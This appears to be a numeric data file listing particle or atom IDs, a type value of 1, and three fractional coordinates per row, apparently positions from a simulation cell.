230 1 0.184297 0.431328 0.134146
233 1 0.254244 0.363377 0.125442
234 1 0.316812 0.442074 0.127498
1031 1 0.189927 0.497284 0.0727541
102 1 0.198861 0.437305 0.0100326
106 1 0.305361 0.444269 0.00570288
1169 1 0.495688 0.49476 0.129357
111 1 0.439739 0.370403 0.0596494
112 1 0.382055 0.432033 0.0645835
237 1 0.390137 0.373927 0.124025
238 1 0.445138 0.432259 0.129537
1165 1 0.381304 0.491683 0.12932
1039 1 0.438648 0.493656 0.0706543
116 1 0.503189 0.436567 0.0606158
241 1 0.500144 0.368258 0.121423
115 1 0.559084 0.376872 0.0574744
120 1 0.625103 0.441154 0.0575074
242 1 0.559678 0.442361 0.121917
245 1 0.623913 0.381813 0.116352
1043 1 0.559189 0.499218 0.0563459
117 1 0.622536 0.372631 7.60526e-05
113 1 0.503824 0.366053 0.00101907
114 1 0.556925 0.43937 0.000178973
119 1 0.690029 0.376238 0.0609137
123 1 0.815313 0.378998 0.0616236
124 1 0.759391 0.439723 0.0560861
246 1 0.685807 0.436367 0.126553
249 1 0.750717 0.380718 0.121318
250 1 0.819825 0.435973 0.123049
1047 1 0.694157 0.498194 0.057227
1177 1 0.753685 0.496646 0.118017
126 1 0.93435 0.439977 0.00627683
1053 1 0.882555 0.499621 0.00115897
225 1 0.996166 0.3724 0.125924
100 1 0.997643 0.433141 0.0620464
127 1 0.935941 0.368689 0.0662383
128 1 0.876206 0.441698 0.0601959
253 1 0.873727 0.365926 0.121554
254 1 0.935601 0.434055 0.120289
1055 1 0.939368 0.497967 0.0678297
1181 1 0.878863 0.499827 0.126726
259 1 0.0565572 0.000414809 0.308376
136 1 0.129436 0.064618 0.182635
163 1 0.0640827 0.123877 0.184253
258 1 0.0662541 0.0596461 0.251425
264 1 0.127049 0.0570362 0.306392
291 1 0.0732193 0.116105 0.319356
293 1 0.129167 0.123144 0.2474
289 1 0.00204297 0.125387 0.256579
131 1 0.0711838 0.000999719 0.194282
139 1 0.317293 0.000885977 0.18865
140 1 0.256016 0.055746 0.185537
167 1 0.190176 0.133277 0.185186
171 1 0.309518 0.125062 0.183755
262 1 0.187576 0.0652493 0.240892
266 1 0.317563 0.0575759 0.246528
268 1 0.249912 0.0540318 0.300983
295 1 0.187193 0.125175 0.315931
297 1 0.248099 0.116348 0.244811
299 1 0.310135 0.122105 0.308364
267 1 0.316216 0.00456555 0.306209
273 1 0.499105 0.00997211 0.246188
269 1 0.384073 0.000217788 0.247436
144 1 0.37568 0.0707162 0.182797
175 1 0.438743 0.133769 0.181454
270 1 0.436509 0.0691415 0.235673
272 1 0.380344 0.0652718 0.314133
301 1 0.373224 0.129184 0.243789
303 1 0.437185 0.120059 0.316603
305 1 0.495062 0.122584 0.250722
148 1 0.493762 0.0703723 0.182514
147 1 0.555132 0.00229531 0.185603
276 1 0.503994 0.0584305 0.313844
152 1 0.625503 0.0712222 0.182925
179 1 0.564569 0.123968 0.184759
274 1 0.569237 0.0610354 0.247504
280 1 0.629743 0.0629336 0.309739
307 1 0.56563 0.129756 0.306172
309 1 0.62913 0.123242 0.25323
281 1 0.747218 0.00396904 0.250125
155 1 0.813087 0.00253837 0.196412
283 1 0.812299 0.0109066 0.31619
156 1 0.74391 0.0670888 0.190519
183 1 0.684164 0.126009 0.180956
187 1 0.807814 0.126769 0.189073
278 1 0.690184 0.0685558 0.257577
282 1 0.809024 0.0675577 0.252296
284 1 0.750274 0.0698333 0.3201
311 1 0.685946 0.131985 0.312882
313 1 0.740982 0.135896 0.252441
315 1 0.80625 0.128088 0.31386
151 1 0.682924 0.000817487 0.185213
279 1 0.689308 0.00113855 0.31504
285 1 0.872135 0.000415968 0.257827
132 1 0.999423 0.065671 0.197055
159 1 0.934174 0.00318601 0.188882
260 1 0.997122 0.0699007 0.320016
160 1 0.876468 0.0687117 0.192343
191 1 0.936258 0.131905 0.189741
286 1 0.930376 0.0588509 0.253288
288 1 0.870897 0.0705589 0.314562
317 1 0.875712 0.127353 0.244116
319 1 0.930524 0.129582 0.315306
287 1 0.940206 0.00301296 0.315358
257 1 0.996595 0.00350416 0.250593
168 1 0.127209 0.191558 0.189696
195 1 0.0660123 0.251225 0.196061
200 1 0.125058 0.309582 0.187085
290 1 0.0712299 0.184039 0.258893
296 1 0.127664 0.183216 0.314672
322 1 0.0667037 0.312513 0.256821
323 1 0.0642226 0.250456 0.311865
325 1 0.130138 0.250571 0.257949
328 1 0.119002 0.314136 0.320616
321 1 0.000721527 0.241674 0.253799
172 1 0.251115 0.18914 0.185656
199 1 0.19344 0.247326 0.189114
203 1 0.31503 0.255798 0.181041
204 1 0.249209 0.309581 0.191835
294 1 0.190447 0.177052 0.254652
298 1 0.302164 0.175845 0.252911
300 1 0.248631 0.186913 0.321318
326 1 0.183707 0.313727 0.250178
327 1 0.188983 0.246045 0.312051
329 1 0.249613 0.251089 0.251748
330 1 0.313827 0.317204 0.247669
331 1 0.311272 0.248405 0.308032
332 1 0.243707 0.309753 0.311956
176 1 0.371865 0.192375 0.187245
207 1 0.438288 0.255202 0.19267
208 1 0.37923 0.317742 0.189826
302 1 0.431498 0.186668 0.245193
304 1 0.378788 0.180091 0.312252
333 1 0.370331 0.250343 0.248901
334 1 0.447412 0.311098 0.252938
335 1 0.436785 0.247291 0.30907
336 1 0.378604 0.313373 0.311762
308 1 0.493547 0.183053 0.307382
340 1 0.499381 0.309883 0.316631
212 1 0.505823 0.302948 0.18548
180 1 0.503677 0.188953 0.180575
337 1 0.507168 0.247042 0.249991
184 1 0.633089 0.196016 0.187141
211 1 0.569013 0.248835 0.186554
216 1 0.631089 0.312309 0.184568
306 1 0.558406 0.184284 0.243431
312 1 0.623391 0.19324 0.311526
338 1 0.562591 0.314372 0.260251
339 1 0.562076 0.243118 0.318261
341 1 0.623631 0.256272 0.25304
344 1 0.627891 0.29938 0.323897
188 1 0.745594 0.188846 0.179614
215 1 0.703908 0.259117 0.187684
219 1 0.81558 0.253431 0.179238
220 1 0.764444 0.316499 0.190309
310 1 0.684419 0.195572 0.247556
314 1 0.815778 0.188495 0.250109
316 1 0.748454 0.194287 0.318858
342 1 0.692404 0.314329 0.252913
343 1 0.689102 0.252227 0.309533
345 1 0.760707 0.249191 0.24599
346 1 0.813306 0.324464 0.262143
347 1 0.801085 0.257967 0.31788
348 1 0.743556 0.315792 0.315912
196 1 0.999119 0.306968 0.194388
292 1 0.993512 0.181872 0.32329
164 1 0.998136 0.182228 0.193998
324 1 0.994198 0.31042 0.312565
192 1 0.863492 0.187834 0.183061
223 1 0.931013 0.242174 0.191254
224 1 0.87258 0.312959 0.186686
318 1 0.934218 0.191 0.2583
320 1 0.868164 0.193348 0.310307
349 1 0.862555 0.25335 0.247697
350 1 0.929198 0.310755 0.250597
351 1 0.934351 0.253789 0.313127
352 1 0.869143 0.314194 0.3249
227 1 0.0641682 0.376947 0.19514
232 1 0.121093 0.441191 0.189849
354 1 0.0649897 0.43891 0.249511
355 1 0.0670658 0.376731 0.319004
357 1 0.11907 0.376049 0.250163
360 1 0.125581 0.436376 0.321527
228 1 0.000452675 0.439151 0.183139
356 1 0.00718559 0.434872 0.314016
1285 1 0.126234 0.498334 0.252558
1163 1 0.311303 0.492584 0.19305
231 1 0.184628 0.370412 0.193416
235 1 0.303967 0.383904 0.189288
236 1 0.245148 0.445977 0.192844
358 1 0.186834 0.430916 0.256134
359 1 0.186173 0.373662 0.320578
361 1 0.244455 0.372797 0.255943
362 1 0.315268 0.43998 0.259447
363 1 0.313867 0.373648 0.314304
364 1 0.242189 0.42989 0.317176
1287 1 0.193393 0.498441 0.307844
1289 1 0.248281 0.49779 0.251756
1167 1 0.438262 0.493268 0.191139
239 1 0.4461 0.369281 0.191217
240 1 0.380109 0.430089 0.18568
365 1 0.372631 0.376715 0.254974
366 1 0.43981 0.438263 0.249753
367 1 0.439216 0.376651 0.308024
368 1 0.375136 0.435768 0.315129
244 1 0.499482 0.432883 0.19302
1295 1 0.438602 0.49781 0.302718
372 1 0.502235 0.440118 0.312916
369 1 0.506102 0.376853 0.257459
243 1 0.566916 0.3698 0.190502
248 1 0.625246 0.442098 0.18351
370 1 0.566183 0.440842 0.248823
371 1 0.570289 0.383304 0.315865
373 1 0.63593 0.372603 0.25175
376 1 0.629336 0.443156 0.312789
1171 1 0.562188 0.496071 0.186107
1305 1 0.75248 0.498055 0.251257
247 1 0.698181 0.368625 0.180705
251 1 0.81892 0.372814 0.186165
252 1 0.752613 0.438241 0.176517
374 1 0.684833 0.435744 0.232467
375 1 0.68918 0.371733 0.312853
377 1 0.748556 0.383661 0.2448
378 1 0.812586 0.43996 0.240946
379 1 0.807743 0.384511 0.318592
380 1 0.74848 0.441809 0.307478
1175 1 0.693097 0.498991 0.180175
1179 1 0.814064 0.498886 0.178295
1307 1 0.815758 0.495645 0.314288
1303 1 0.691868 0.498188 0.307526
1183 1 0.939527 0.499632 0.177487
1311 1 0.930977 0.496889 0.313792
353 1 0.993963 0.373152 0.246172
255 1 0.929462 0.375471 0.18908
256 1 0.878582 0.441149 0.187155
381 1 0.877812 0.375232 0.250494
382 1 0.940345 0.441483 0.247686
383 1 0.937163 0.381519 0.316678
384 1 0.877079 0.437654 0.309054
386 1 0.0671931 0.0560101 0.378639
392 1 0.139051 0.0511576 0.434894
419 1 0.0695381 0.118189 0.443757
421 1 0.129883 0.119813 0.377369
417 1 0.00906949 0.117649 0.380875
388 1 0.00158545 0.0617551 0.443217
518 1 0.195112 0.0541287 0.495823
390 1 0.186618 0.0585888 0.370251
394 1 0.317515 0.0620401 0.363414
396 1 0.251887 0.0595268 0.437592
423 1 0.190646 0.118318 0.434899
425 1 0.250026 0.113863 0.372133
427 1 0.308295 0.117554 0.438646
395 1 0.318794 0.00149328 0.434646
398 1 0.442448 0.060856 0.373163
400 1 0.385455 0.0581187 0.432899
429 1 0.368808 0.120165 0.373746
431 1 0.432768 0.130943 0.437007
525 1 0.382653 0.000477807 0.488197
403 1 0.559799 0.00729634 0.438625
405 1 0.624702 0.00834647 0.370963
404 1 0.501251 0.0755657 0.437406
433 1 0.501471 0.12243 0.372744
402 1 0.562954 0.0681385 0.378609
408 1 0.624553 0.0661749 0.43386
435 1 0.568164 0.125738 0.439739
437 1 0.628638 0.117937 0.376083
401 1 0.504656 0.00313212 0.370533
565 1 0.633412 0.122192 0.496744
529 1 0.500518 0.00631837 0.499628
533 1 0.628427 0.00274921 0.499927
409 1 0.75091 0.00172483 0.375486
406 1 0.691995 0.0642952 0.378951
410 1 0.8104 0.0713467 0.375642
412 1 0.748857 0.0616365 0.440691
439 1 0.689425 0.129481 0.440864
441 1 0.7507 0.132929 0.379265
443 1 0.810692 0.129719 0.443751
569 1 0.749629 0.135791 0.492733
415 1 0.938783 0.00664016 0.436108
414 1 0.93898 0.0619269 0.37646
416 1 0.87034 0.0612477 0.432591
445 1 0.870868 0.129988 0.376086
447 1 0.937757 0.121259 0.436445
573 1 0.880569 0.121708 0.495782
418 1 0.0678268 0.185727 0.377017
424 1 0.133697 0.182642 0.442668
450 1 0.0612166 0.316289 0.386841
451 1 0.0629657 0.244691 0.447917
453 1 0.122826 0.249759 0.376897
456 1 0.126958 0.30679 0.441484
578 1 0.0617769 0.314399 0.499922
585 1 0.24715 0.25447 0.495774
422 1 0.185527 0.175578 0.376049
426 1 0.307385 0.177534 0.367406
428 1 0.246243 0.186573 0.437882
454 1 0.181544 0.305131 0.375893
455 1 0.186571 0.250063 0.438609
457 1 0.241276 0.244043 0.374309
458 1 0.319711 0.308124 0.374438
459 1 0.315047 0.252458 0.435654
460 1 0.246682 0.308974 0.434999
554 1 0.309818 0.184274 0.493833
586 1 0.308402 0.309881 0.493538
590 1 0.440778 0.303222 0.491464
430 1 0.434555 0.182258 0.375137
432 1 0.368079 0.17678 0.434922
461 1 0.372862 0.242914 0.372612
462 1 0.434146 0.302745 0.374125
463 1 0.43704 0.24154 0.435763
464 1 0.377722 0.311453 0.431851
468 1 0.497617 0.309256 0.428502
558 1 0.432604 0.188541 0.494337
436 1 0.505639 0.176088 0.44679
465 1 0.500957 0.243346 0.376107
467 1 0.565361 0.244054 0.448013
434 1 0.569407 0.184443 0.382102
469 1 0.627587 0.246635 0.383947
472 1 0.621607 0.313744 0.444152
466 1 0.567878 0.309661 0.377673
440 1 0.624173 0.19177 0.44737
594 1 0.563425 0.311455 0.496941
473 1 0.746324 0.255658 0.381248
475 1 0.806953 0.258056 0.449302
470 1 0.688583 0.318958 0.382257
442 1 0.808859 0.186448 0.379792
438 1 0.684901 0.192229 0.378514
476 1 0.753549 0.311547 0.442639
471 1 0.687759 0.256555 0.439059
444 1 0.754227 0.201552 0.442306
474 1 0.804879 0.315776 0.377931
449 1 0.993778 0.250126 0.381954
420 1 0.993694 0.185156 0.442256
452 1 0.994702 0.317014 0.439571
446 1 0.928157 0.197524 0.373125
448 1 0.877711 0.1887 0.432458
478 1 0.931088 0.315133 0.377649
480 1 0.874909 0.315179 0.446565
477 1 0.867167 0.253173 0.381455
479 1 0.933798 0.253872 0.439222
574 1 0.935019 0.1899 0.496134
613 1 0.126726 0.379082 0.495474
482 1 0.0603128 0.443197 0.375878
483 1 0.0626419 0.381061 0.442962
488 1 0.116745 0.445854 0.435294
485 1 0.121161 0.374819 0.379627
489 1 0.25395 0.380146 0.382088
486 1 0.187077 0.434374 0.379135
491 1 0.318201 0.371148 0.426344
490 1 0.311875 0.437118 0.367354
492 1 0.254021 0.444172 0.430995
1419 1 0.318808 0.498721 0.430363
617 1 0.254469 0.382272 0.488775
487 1 0.190331 0.371155 0.439157
614 1 0.183885 0.438609 0.498256
618 1 0.316014 0.433347 0.484262
621 1 0.372627 0.3724 0.497651
493 1 0.383378 0.375253 0.372097
497 1 0.495735 0.373691 0.38187
495 1 0.44011 0.36954 0.433977
494 1 0.442609 0.436531 0.37838
496 1 0.383347 0.442892 0.436895
625 1 0.497939 0.373702 0.499305
622 1 0.43304 0.429084 0.496445
500 1 0.504724 0.436732 0.434012
498 1 0.564148 0.445574 0.374327
501 1 0.628375 0.373421 0.375721
499 1 0.560876 0.375579 0.4411
504 1 0.629138 0.435543 0.437651
1427 1 0.567187 0.495566 0.441552
626 1 0.570155 0.434641 0.496437
503 1 0.68564 0.37307 0.441296
502 1 0.692414 0.428278 0.375312
505 1 0.747178 0.372143 0.382875
508 1 0.755072 0.438569 0.441064
506 1 0.814096 0.446775 0.371958
507 1 0.812354 0.383609 0.435667
1431 1 0.687781 0.491296 0.435966
634 1 0.815141 0.444945 0.4955
1433 1 0.744385 0.498243 0.373916
481 1 0.997047 0.374586 0.376238
1409 1 0.99439 0.493779 0.382113
512 1 0.879944 0.436258 0.44217
511 1 0.934131 0.376557 0.442888
510 1 0.939314 0.43681 0.377536
509 1 0.872807 0.380066 0.3705
484 1 0.990854 0.434178 0.445828
520 1 0.132482 0.056368 0.567599
547 1 0.071341 0.118291 0.557594
642 1 0.0639421 0.0590157 0.618476
677 1 0.120767 0.120947 0.620026
673 1 0.00928493 0.118228 0.618831
549 1 0.129357 0.108455 0.501716
514 1 0.0606581 0.0576103 0.502378
641 1 0.00390032 0.000386603 0.618468
524 1 0.25138 0.0595999 0.563012
551 1 0.189389 0.128261 0.558067
555 1 0.311577 0.120246 0.563421
646 1 0.199596 0.0615075 0.62415
650 1 0.30853 0.0569248 0.616628
681 1 0.242778 0.128274 0.619754
522 1 0.308078 0.0641344 0.50413
553 1 0.250453 0.122139 0.504919
528 1 0.373923 0.0580183 0.562554
559 1 0.436285 0.128057 0.567539
654 1 0.434464 0.0581554 0.628362
685 1 0.376234 0.12335 0.624459
532 1 0.492372 0.0576537 0.567989
557 1 0.375399 0.123509 0.507263
526 1 0.434199 0.0647741 0.505771
689 1 0.505234 0.119591 0.624169
536 1 0.625574 0.0654157 0.564643
563 1 0.560882 0.124958 0.566258
658 1 0.564378 0.0526167 0.6352
693 1 0.620881 0.125838 0.625667
661 1 0.630164 0.00432539 0.618959
531 1 0.564625 0.000641042 0.566246
530 1 0.562806 0.0624388 0.504075
561 1 0.503837 0.115487 0.507806
540 1 0.764578 0.0697048 0.558381
567 1 0.697633 0.12637 0.56686
571 1 0.818794 0.128966 0.561506
662 1 0.692404 0.0604863 0.618962
666 1 0.811552 0.0650363 0.62531
697 1 0.755682 0.130289 0.626598
539 1 0.811378 0.00198473 0.564049
534 1 0.696217 0.0690999 0.509214
538 1 0.815356 0.0628043 0.503181
516 1 0.996026 0.0635124 0.561896
544 1 0.87277 0.0569664 0.560937
575 1 0.942122 0.122931 0.557163
670 1 0.937802 0.0649534 0.627623
701 1 0.877259 0.122896 0.623291
669 1 0.87724 0.00595232 0.632447
542 1 0.933977 0.0610287 0.50089
545 1 0.99922 0.12351 0.502583
552 1 0.123382 0.179836 0.560693
579 1 0.0549391 0.249495 0.564604
584 1 0.119182 0.309567 0.562076
674 1 0.0630856 0.188664 0.62423
706 1 0.0587391 0.307644 0.632963
709 1 0.118698 0.250905 0.632382
546 1 0.0583156 0.188455 0.505324
548 1 0.00196756 0.186885 0.562425
581 1 0.125719 0.243896 0.503333
577 1 0.00211722 0.252193 0.501316
556 1 0.252907 0.184089 0.561511
583 1 0.178328 0.243964 0.564208
587 1 0.307677 0.244391 0.564534
588 1 0.248035 0.316658 0.558609
678 1 0.177605 0.187232 0.621663
682 1 0.3083 0.183021 0.620478
710 1 0.179472 0.319183 0.620958
713 1 0.247173 0.247915 0.61462
714 1 0.315179 0.313143 0.618755
550 1 0.188996 0.187693 0.503548
582 1 0.178631 0.319056 0.502421
560 1 0.372241 0.183126 0.562002
591 1 0.439857 0.247456 0.559834
592 1 0.368014 0.314231 0.555691
686 1 0.438044 0.194053 0.621975
717 1 0.366778 0.242384 0.617639
718 1 0.429128 0.308821 0.616883
564 1 0.498269 0.187286 0.561255
589 1 0.366949 0.244998 0.502101
597 1 0.632653 0.258114 0.503969
596 1 0.50216 0.316501 0.557816
721 1 0.501131 0.251153 0.621794
568 1 0.62651 0.187484 0.566356
595 1 0.568106 0.25667 0.558005
600 1 0.630321 0.314333 0.567664
690 1 0.562565 0.192933 0.63089
722 1 0.555978 0.316641 0.626321
725 1 0.622161 0.250843 0.626002
562 1 0.566745 0.186899 0.505129
593 1 0.504731 0.246932 0.500378
566 1 0.68617 0.194159 0.507507
598 1 0.69136 0.318972 0.505415
572 1 0.754183 0.19045 0.563445
599 1 0.68817 0.254251 0.568889
603 1 0.810959 0.258746 0.567872
604 1 0.747655 0.313936 0.565451
694 1 0.687222 0.179485 0.624728
698 1 0.811415 0.197592 0.626582
726 1 0.693989 0.316558 0.632612
729 1 0.746441 0.252035 0.628461
730 1 0.811543 0.31721 0.629391
570 1 0.810517 0.195477 0.503345
602 1 0.816186 0.313732 0.502867
601 1 0.747997 0.257038 0.506109
705 1 0.995392 0.248578 0.62238
580 1 0.999885 0.313103 0.561486
576 1 0.877128 0.190332 0.56383
607 1 0.945047 0.253742 0.564145
608 1 0.887607 0.316513 0.565135
702 1 0.943052 0.179133 0.619518
733 1 0.88536 0.257348 0.621749
734 1 0.936526 0.315971 0.629526
605 1 0.872407 0.251276 0.503077
606 1 0.942238 0.306094 0.503111
1541 1 0.124039 0.496917 0.501833
611 1 0.0583257 0.370699 0.564345
616 1 0.126191 0.441022 0.557561
738 1 0.0622368 0.442388 0.630611
741 1 0.116889 0.375147 0.627585
610 1 0.0646782 0.436537 0.507656
1547 1 0.316033 0.49751 0.562502
1545 1 0.254697 0.497237 0.502756
615 1 0.188206 0.379853 0.564208
619 1 0.310142 0.376213 0.567693
620 1 0.255298 0.434379 0.561729
742 1 0.179733 0.43427 0.624703
745 1 0.250687 0.381134 0.621385
746 1 0.309682 0.441325 0.633992
1551 1 0.440367 0.488348 0.558494
623 1 0.44146 0.369674 0.558723
624 1 0.369632 0.430302 0.567591
749 1 0.379423 0.366315 0.62758
750 1 0.440848 0.435179 0.626056
753 1 0.497386 0.374858 0.619552
1549 1 0.381859 0.499121 0.501535
1677 1 0.376847 0.489747 0.626038
1685 1 0.613752 0.499158 0.632723
628 1 0.500509 0.436401 0.567535
627 1 0.563826 0.375209 0.561513
632 1 0.620634 0.433046 0.565807
754 1 0.557046 0.434693 0.633606
757 1 0.618946 0.37912 0.629962
1555 1 0.553314 0.498264 0.575869
1553 1 0.507024 0.493564 0.506305
1557 1 0.62575 0.495738 0.513247
629 1 0.629331 0.371671 0.506681
631 1 0.689504 0.379675 0.572694
635 1 0.810213 0.373842 0.565441
636 1 0.752874 0.437738 0.562063
758 1 0.674584 0.442161 0.626577
761 1 0.745941 0.38189 0.62817
762 1 0.810054 0.430806 0.622838
1559 1 0.690099 0.499345 0.56465
633 1 0.751519 0.377224 0.504097
1561 1 0.750893 0.498819 0.505447
630 1 0.684609 0.436676 0.501766
609 1 0.995034 0.376015 0.50706
737 1 0.997707 0.379018 0.634066
612 1 0.993757 0.438554 0.571105
639 1 0.935103 0.381943 0.569422
640 1 0.867752 0.439414 0.563665
765 1 0.874936 0.378194 0.623276
766 1 0.93425 0.440362 0.631145
637 1 0.87002 0.380834 0.507667
638 1 0.930018 0.436579 0.502554
643 1 0.0654935 0.00510844 0.678605
773 1 0.123847 0.00868498 0.752024
648 1 0.132781 0.0622276 0.677449
675 1 0.0651296 0.115879 0.686133
770 1 0.0607574 0.0600819 0.746825
776 1 0.121566 0.0606807 0.815977
803 1 0.0650735 0.130197 0.806
805 1 0.126864 0.119568 0.745938
772 1 0.00531154 0.0645393 0.811635
652 1 0.250868 0.0651833 0.694998
679 1 0.193725 0.116039 0.68423
683 1 0.312087 0.118134 0.676875
774 1 0.192439 0.0592989 0.750766
778 1 0.31397 0.0664772 0.749962
780 1 0.245111 0.0557268 0.810522
807 1 0.185434 0.121681 0.812034
809 1 0.24968 0.12676 0.746731
811 1 0.299526 0.115861 0.811181
775 1 0.180097 0.0053913 0.820043
656 1 0.368644 0.055332 0.684148
687 1 0.438836 0.129767 0.686854
782 1 0.436124 0.0726336 0.748047
784 1 0.364022 0.057688 0.806643
813 1 0.36654 0.117435 0.745043
815 1 0.436212 0.135468 0.801063
660 1 0.494369 0.0615541 0.681535
788 1 0.495001 0.069678 0.798511
783 1 0.434702 0.00210318 0.807104
789 1 0.627961 0.008086 0.754316
787 1 0.560549 0.00540985 0.815863
817 1 0.500518 0.130181 0.746166
664 1 0.630862 0.0610571 0.689599
691 1 0.563308 0.126436 0.685856
786 1 0.561355 0.0702487 0.749482
792 1 0.623475 0.0667451 0.814124
819 1 0.554524 0.129899 0.813432
821 1 0.627088 0.126611 0.753559
793 1 0.755324 0.00146496 0.750426
791 1 0.690745 0.0032831 0.814177
668 1 0.743744 0.0692725 0.68451
695 1 0.674656 0.130546 0.690206
699 1 0.807763 0.125826 0.684891
790 1 0.695393 0.06685 0.751011
794 1 0.813101 0.0721961 0.760031
796 1 0.755597 0.0601523 0.810878
823 1 0.687631 0.123056 0.806698
825 1 0.747246 0.129825 0.75067
827 1 0.814041 0.12924 0.821644
667 1 0.813049 0.00455409 0.690862
663 1 0.691036 0.0017942 0.683721
799 1 0.938433 0.00199386 0.811744
644 1 0.999889 0.0651257 0.680902
797 1 0.876195 0.0027061 0.746412
801 1 0.999624 0.125968 0.745551
672 1 0.866917 0.0704702 0.695819
703 1 0.939225 0.133525 0.6865
798 1 0.941107 0.0636447 0.750567
800 1 0.878959 0.0612945 0.810759
829 1 0.878543 0.133138 0.750409
831 1 0.947115 0.128634 0.817372
671 1 0.936513 0.00195513 0.686559
707 1 0.0567452 0.248598 0.689017
680 1 0.122937 0.185624 0.689622
712 1 0.123162 0.311729 0.691704
802 1 0.0695885 0.19251 0.750192
808 1 0.133884 0.184693 0.805449
834 1 0.0641591 0.31576 0.757684
835 1 0.0635511 0.251371 0.814009
837 1 0.126435 0.253905 0.74794
840 1 0.128036 0.316702 0.814438
836 1 0.000639547 0.309102 0.813216
676 1 0.00268381 0.18402 0.690894
804 1 0.00164552 0.184861 0.808198
684 1 0.243197 0.191789 0.6813
711 1 0.182258 0.253506 0.6772
715 1 0.30871 0.260312 0.679244
716 1 0.235495 0.317081 0.674815
806 1 0.189299 0.186615 0.745976
810 1 0.302744 0.186836 0.74181
812 1 0.246652 0.18206 0.808054
838 1 0.190376 0.311499 0.755955
839 1 0.190261 0.246346 0.806219
841 1 0.244945 0.250858 0.742392
842 1 0.301467 0.310569 0.745331
843 1 0.302684 0.250335 0.812656
844 1 0.251458 0.311519 0.814651
688 1 0.373627 0.185534 0.683486
719 1 0.424117 0.256062 0.682183
720 1 0.366802 0.316031 0.693674
814 1 0.42883 0.185742 0.740604
816 1 0.361828 0.184847 0.81001
845 1 0.364855 0.247258 0.749175
846 1 0.427591 0.307711 0.754493
847 1 0.427621 0.246682 0.809567
848 1 0.362402 0.313782 0.807214
692 1 0.492697 0.199556 0.680468
820 1 0.497495 0.184286 0.812129
724 1 0.486976 0.305186 0.683221
849 1 0.501108 0.248168 0.752954
852 1 0.500979 0.309542 0.815048
696 1 0.617485 0.200218 0.68941
723 1 0.552288 0.256883 0.694884
728 1 0.625372 0.319453 0.685955
818 1 0.569516 0.185711 0.751344
824 1 0.627585 0.184865 0.822775
850 1 0.563434 0.30781 0.758464
851 1 0.557167 0.241495 0.822429
853 1 0.623929 0.255181 0.759316
856 1 0.628589 0.323673 0.81331
700 1 0.744682 0.187628 0.684949
727 1 0.68346 0.252739 0.692315
731 1 0.815175 0.255491 0.69226
732 1 0.751456 0.319781 0.693443
822 1 0.687066 0.190573 0.745839
826 1 0.803111 0.189799 0.743831
828 1 0.743736 0.189489 0.812922
854 1 0.695406 0.319635 0.755151
855 1 0.687462 0.248887 0.815172
857 1 0.746936 0.254446 0.753419
858 1 0.807485 0.316472 0.744502
859 1 0.821163 0.247643 0.811978
860 1 0.751906 0.317285 0.814434
708 1 0.998732 0.317619 0.696324
833 1 0.994911 0.248358 0.744842
704 1 0.869949 0.186584 0.682823
735 1 0.936199 0.246848 0.68608
736 1 0.878651 0.320177 0.685767
830 1 0.932131 0.190985 0.756269
832 1 0.878361 0.191364 0.821104
861 1 0.873528 0.24938 0.752941
862 1 0.935368 0.317579 0.757322
863 1 0.933071 0.251271 0.818414
864 1 0.872532 0.323961 0.815274
1797 1 0.119819 0.495765 0.749979
739 1 0.0557871 0.376562 0.696521
744 1 0.117949 0.441948 0.686819
866 1 0.0613815 0.438576 0.756331
867 1 0.0628723 0.370227 0.82298
869 1 0.132396 0.375497 0.75301
872 1 0.117499 0.440129 0.815094
1795 1 0.0590278 0.495924 0.821515
1801 1 0.254104 0.498527 0.763374
1671 1 0.186614 0.497783 0.687088
1803 1 0.315553 0.491356 0.818512
743 1 0.180321 0.37717 0.680092
747 1 0.304786 0.375852 0.69046
748 1 0.2383 0.433113 0.68472
870 1 0.181253 0.43863 0.750149
871 1 0.177135 0.382205 0.817079
873 1 0.237605 0.375871 0.754876
874 1 0.302595 0.432506 0.75101
875 1 0.303816 0.381996 0.81484
876 1 0.244151 0.436813 0.818081
1675 1 0.302741 0.493843 0.69488
1805 1 0.374363 0.499774 0.753094
751 1 0.434987 0.368721 0.695488
752 1 0.364937 0.436383 0.689937
877 1 0.367733 0.37635 0.754262
878 1 0.433026 0.434524 0.750872
879 1 0.441409 0.374049 0.810592
880 1 0.375868 0.441449 0.814873
756 1 0.497775 0.438367 0.69702
1807 1 0.441531 0.498731 0.811072
1809 1 0.498251 0.499382 0.749514
1679 1 0.438488 0.499836 0.696106
1683 1 0.561115 0.499278 0.697419
881 1 0.500171 0.363111 0.756621
884 1 0.500866 0.433355 0.807968
755 1 0.558252 0.369765 0.698138
760 1 0.621461 0.433296 0.692645
882 1 0.562465 0.438846 0.7568
883 1 0.567935 0.374283 0.816354
885 1 0.621531 0.373604 0.749323
888 1 0.629088 0.434371 0.815309
1813 1 0.626462 0.495017 0.758068
1815 1 0.688872 0.499893 0.81742
759 1 0.684132 0.380503 0.686143
763 1 0.816036 0.375035 0.69015
764 1 0.754122 0.446274 0.686556
886 1 0.695129 0.43908 0.748738
887 1 0.692105 0.376315 0.810285
889 1 0.756756 0.381363 0.747136
890 1 0.815592 0.444683 0.750149
891 1 0.814312 0.377616 0.812338
892 1 0.75675 0.439796 0.817781
1823 1 0.926352 0.498269 0.813468
865 1 0.998336 0.373242 0.757999
868 1 0.994865 0.436142 0.810721
740 1 0.996874 0.431382 0.698683
1695 1 0.937526 0.49618 0.691932
767 1 0.941544 0.37358 0.697815
768 1 0.868801 0.448728 0.68437
893 1 0.877606 0.382124 0.748619
894 1 0.927437 0.442764 0.750656
895 1 0.928803 0.382487 0.817631
896 1 0.865849 0.442888 0.817803
1793 1 0.992715 0.49394 0.750044
899 1 0.0612795 0.0050437 0.93913
901 1 0.122834 0.00619409 0.881508
898 1 0.0555217 0.0627826 0.88011
904 1 0.127045 0.0695294 0.942327
931 1 0.0675366 0.130796 0.943739
933 1 0.121583 0.121467 0.885682
900 1 0.000239848 0.0672502 0.943459
929 1 0.00657832 0.129185 0.874615
5 1 0.124175 0.00932353 0.999299
903 1 0.185749 0.00762248 0.944161
10 1 0.318646 0.0613694 0.996619
902 1 0.182632 0.072281 0.874397
906 1 0.306477 0.0550451 0.865734
908 1 0.255825 0.056344 0.939216
935 1 0.191646 0.128303 0.937916
937 1 0.252892 0.127557 0.873589
939 1 0.316603 0.121751 0.930763
913 1 0.49337 0.00747771 0.87778
909 1 0.371146 0.00202364 0.876048
910 1 0.425591 0.0642587 0.868861
912 1 0.37055 0.0631489 0.933092
941 1 0.370474 0.130808 0.866748
943 1 0.436461 0.12817 0.931482
916 1 0.493539 0.0632454 0.941896
945 1 0.494719 0.123936 0.879313
911 1 0.436892 0.00249549 0.937036
45 1 0.372443 0.132167 0.986635
